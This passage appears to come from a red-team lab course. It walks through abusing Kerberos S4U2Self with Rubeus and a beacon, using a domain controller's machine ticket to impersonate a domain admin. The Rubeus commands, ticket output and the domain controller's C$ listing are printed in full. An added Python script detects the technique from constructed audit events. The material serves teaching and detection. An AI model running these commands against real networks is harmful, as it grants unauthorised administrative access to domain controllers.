As we saw in the previous two examples of constrained delegation, there are two S4U (Service for User) extensions: S4U2Self (Service for User to Self) and S4U2Proxy (Service for User to Proxy). S4U2Self allows a service to obtain a TGS to itself on behalf of a user, and S4U2Proxy allows the service to obtain a TGS on behalf of a user to a second service.
When we abused constrained delegation, we ran: Rubeus s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /user:sql-2$. From the output, we saw that Rubeus first builds an S4U2Self request and obtains a TGS for nlamb to sql-2/dev.cyberbotic.io. It then builds an S4U2Proxy request to obtain a TGS for nlamb to cifs/dc-2.dev.cyberbotic.io.
This works by design, because SQL-2 is specifically trusted for delegation to that service. However, there is another particularly useful way, published by Elad Shamir, to abuse the S4U2Self extension: gaining access to a computer if we hold its TGT.
In the Unconstrained Delegation module, we obtained a TGT for the domain controller. If you tried to pass that ticket into a logon session and use it to access the C$ share (as we would with a user TGT), it would fail.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:DC-2$ /password:FakePass /ticket:doIFuj[...]lDLklP
[*] Using DEV\DC-2$:FakePass
[*] Showing process : False
[*] Username : DC-2$
[*] Domain : DEV
[*] Password : FakePass
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 2832
[+] Ticket successfully imported!
[+] LUID : 0x4d977f
beacon> steal_token 2832
beacon> ls \\dc-2.dev.cyberbotic.io\c$
[-] could not open \\dc-2.dev.cyberbotic.io\c$\*: 5 - ERROR_ACCESS_DENIED
This is because machines do not get remote local admin access to themselves. What we can do instead is abuse S4U2Self to obtain a usable TGS as a user we know is a local admin (e.g. a domain admin). Rubeus has a /self flag for this purpose.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap
[*] Action: S4U
[*] Building S4U2self request for: 'DC-2$@DEV.CYBERBOTIC.IO'
[*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10)
[*] Sending S4U2self request to 10.10.122.10:88
[+] S4U2self success!
[*] Substituting alternative service name 'cifs/dc-2.dev.cyberbotic.io'
[*] Got a TGS for 'nlamb' to 'cifs@DEV.CYBERBOTIC.IO'
[*] base64(ticket.kirbi):
doIFyD[...]MuaW8=
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFyD[...]MuaW8=
[*] Using DEV\nlamb:FakePass
[*] Showing process : False
[*] Username : nlamb
[*] Domain : DEV
[*] Password : FakePass
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 2664
[+] Ticket successfully imported!
[+] LUID : 0x4ff935
beacon> steal_token 2664
beacon> ls \\dc-2.dev.cyberbotic.io\c$
Size Type Last Modified Name
---- ---- ------------- ----
dir 08/15/2022 15:44:08 $Recycle.Bin
dir 08/10/2022 04:55:17 $WinREAgent
dir 08/10/2022 05:05:53 Boot
dir 08/18/2021 23:34:55 Documents and Settings
dir 08/19/2021 06:24:49 EFI
dir 08/15/2022 16:09:55 inetpub
dir 05/08/2021 08:20:24 PerfLogs
dir 08/24/2022 10:51:51 Program Files
dir 08/10/2022 04:06:16 Program Files (x86)
dir 09/05/2022 17:17:48 ProgramData
dir 08/15/2022 15:23:23 Recovery
dir 08/16/2022 12:37:38 Shares
dir 09/05/2022 12:03:43 System Volume Information
dir 08/15/2022 15:24:39 Users
dir 09/06/2022 15:21:25 Windows
427kb fil 08/10/2022 05:00:07 bootmgr
1b fil 05/08/2021 08:14:33 BOOTNXT
1kb fil 08/15/2022 16:16:13 dc-2.dev.cyberbotic.io_sub-ca.req
12kb fil 09/05/2022 07:25:58 DumpStack.log
12kb fil 09/06/2022 09:04:41 DumpStack.log.tmp
384mb fil 09/06/2022 09:04:41 pagefile.sys
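From the defensive side, the distinguishing feature of the S4U2Self-to-self trick above is that the impersonated user (nlamb) never authenticated: only the computer account's TGT was used, yet a service ticket for nlamb to DC-2$ was issued to a host that never obtained a TGT for nlamb. The following added example (not part of the original course material or Rubeus) runs that correlation over a few constructed Kerberos audit records. It assumes a simplified pipe-delimited export of events 4768 (TGT requested) and 4769 (service ticket requested), and assumes the 4769 record carries the impersonated user as the account name and the requesting computer account as the service name.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs): "time|event_id|account|service|client_ip".
# Assumed field mapping: for an S4U2Self request, 4769 carries the impersonated
# user as the account and the requesting computer account as the service name.
SAMPLE_EVENTS = """\
2022-09-06T15:01:00|4768|nlamb|krbtgt|10.10.122.30
2022-09-06T15:01:05|4769|nlamb|WKSTN-1$|10.10.122.30
2022-09-06T15:20:00|4768|DC-2$|krbtgt|10.10.122.10
2022-09-06T15:22:10|4769|nlamb|DC-2$|10.10.120.50
"""


def parse_events(text):
    """Parse the constructed export into a list of event dicts."""
    events = []
    for line in text.splitlines():
        ts, eid, account, service, ip = line.split("|")
        events.append({"time": datetime.fromisoformat(ts), "id": int(eid),
                       "account": account.lower(), "service": service, "ip": ip})
    return events


def find_s4u2self_candidates(events, window=timedelta(hours=10)):
    """Flag 4769 events where a user ticket is issued to a computer account from a
    client address that never obtained a TGT (4768) for that user within the
    lookback window. Legitimate access always starts with the user's own TGT
    from the same host; an S4U2Self request only needs the computer's TGT."""
    tgt_times = defaultdict(list)  # (account, client_ip) -> times of 4768
    for e in events:
        if e["id"] == 4768:
            tgt_times[(e["account"], e["ip"])].append(e["time"])
    hits = []
    for e in events:
        # Only user -> computer-account service tickets are of interest here.
        if e["id"] != 4769 or not e["service"].endswith("$") or e["account"].endswith("$"):
            continue
        recent = [t for t in tgt_times[(e["account"], e["ip"])]
                  if e["time"] - window <= t <= e["time"]]
        if not recent:
            hits.append(e)
    return hits


if __name__ == "__main__":
    for hit in find_s4u2self_candidates(parse_events(SAMPLE_EVENTS)):
        print(f"{hit['time']} possible S4U2Self: {hit['account']} -> {hit['service']} from {hit['ip']}")
```

The window should be tuned to the domain's TGT lifetime, and cached tickets from an earlier logon or renewals outside the export can still produce false positives, so treat a hit as a lead to correlate with the session data on the source host rather than as a verdict.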